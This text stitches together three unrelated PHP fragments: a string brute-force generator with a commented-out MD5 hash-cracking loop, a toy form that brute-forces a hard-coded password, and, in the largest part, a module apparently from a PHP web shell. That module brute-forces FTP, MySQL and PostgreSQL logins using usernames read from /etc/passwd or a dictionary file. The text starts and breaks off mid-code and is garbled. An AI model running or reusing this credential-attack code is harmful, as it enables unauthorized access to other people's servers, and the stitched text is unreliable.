$word[$wpos] = $prelast; } } */ return $word; } //===CODE=== //$test = ("nazdar"); //echo ($test["2"]); //die(); echo nextChar("d") . "\n"; echo bruteForce("ahoj") . "\n----------------------\n\n"; $ted = "a"; while (1) { echo $ted . "\n"; $ted = bruteForce($ted); } /* $hash = ("79c2b46ce2594ecbcb5b73e928345492"); $pass = ("ahoj"); //echo(md5("ahoj")); $loop = 1; while($loop) { $now = $pass; if ( md5($now) == $hash ) { die ("Hash: $hash\nVysledek: $now\n"); }
function actionBruteforce() { hardHeader(); if (isset($_POST['proto'])) { echo '<h1>Results</h1><div class=content><span>Type:</span> ' . htmlspecialchars($_POST['proto']) . ' <span>Server:</span> ' . htmlspecialchars($_POST['server']) . '<br>'; if ($_POST['proto'] == 'ftp') { function bruteForce($ip, $port, $login, $pass) { $fp = @ftp_connect($ip, $port ? $port : 21); if (!$fp) { return false; } $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif ($_POST['proto'] == 'mysql') { function bruteForce($ip, $port, $login, $pass) { $res = @mysql_connect($ip . ':' . ($port ? $port : 3306), $login, $pass); @mysql_close($res); return $res; } } elseif ($_POST['proto'] == 'pgsql') { function bruteForce($ip, $port, $login, $pass) { $str = "host='" . $ip . "' port='" . $port . "' user='******' password='******' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if ($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if (is_array($temp)) { foreach ($temp as $line) { $line = explode(":", $line); ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $line[0])) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($line[0]) . '<br>'; } if (@$_POST['reverse']) { $tmp = ""; for ($i = strlen($line[0]) - 1; $i >= 0; --$i) { $tmp .= $line[0][$i]; } ++$attempts; if (bruteForce(@$server[0], @$server[1], $line[0], $tmp)) { $success++; echo '<b>' . htmlspecialchars($line[0]) . '</b>:' . htmlspecialchars($tmp); } } } } } elseif ($_POST['type'] == 2) { $temp = @file($_POST['dict']); if (is_array($temp)) { foreach ($temp as $line) { $line = trim($line); ++$attempts; if (bruteForce($server[0], @$server[1], $_POST['login'], $line)) { $success++; echo '<b>' . htmlspecialchars($_POST['login']) . '</b>:' . htmlspecialchars($line) . '<br>'; } } } } echo "<span>Attempts:</span> {$attempts} <span>Success:</span> {$success}</div><br>"; } echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' . '<td><label><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></label></td></tr><tr><td>' . '<input type=hidden name=c value="' . htmlspecialchars($GLOBALS['cwd']) . '">' . '<input type=hidden name=a value="' . htmlspecialchars($_POST['a']) . '">' . '<input type=hidden name=charset value="' . htmlspecialchars($_POST['charset']) . '">' . '<input type=hidden name=ne value="">' . '<span>Server:port</span></td>' . '<td><input type=text name=server value="127.0.0.1"></td></tr>' . '<tr><td><span>Brute type</span></td>' . '<td><input type=radio name=type value="1" checked> /etc/passwd</td></tr>' . '<tr><td></td><td style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</td></tr>' . '<tr><td></td><td><input type=radio name=type value="2"> Dictionary</td></tr>' . '<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' . '<td><input type=text name=login value="root"></td></tr>' . '<tr><td><span>Dictionary</span></td>' . '<td><input type=text name=dict value="' . htmlspecialchars($GLOBALS['cwd']) . 'passwd.dic"></td></tr></table>' . '</td></tr><tr><td></td><td><input type=submit value="submit"></td></tr></form></table>'; echo '</div>'; hardFooter(); }
"> </fieldset> <fieldset> <input type="hidden" name="try" value="1"> <input type="submit" value="Find it"> </fieldset> </form> <p> <?php $count = 0; if (isset($_POST['try'])) { set_time_limit(5); $check = function ($pwd) { //print htmlentities($pwd).'<br>'; return $pwd == 'abcd'; }; $password = bruteForce($chars, $check, $max, $min, $trymax, $count); if (false === $password) { print 'Password not found'; } else { printf('Password is "%s"', $password); } } ?> </p> <p style="font-size:11px;"> <?php print (int) $count . ' tries '; print ' took ' . sprintf("%.2f", microtime(true) - $_SERVER["REQUEST_TIME_FLOAT"]) . ' secondes'; ?> </p>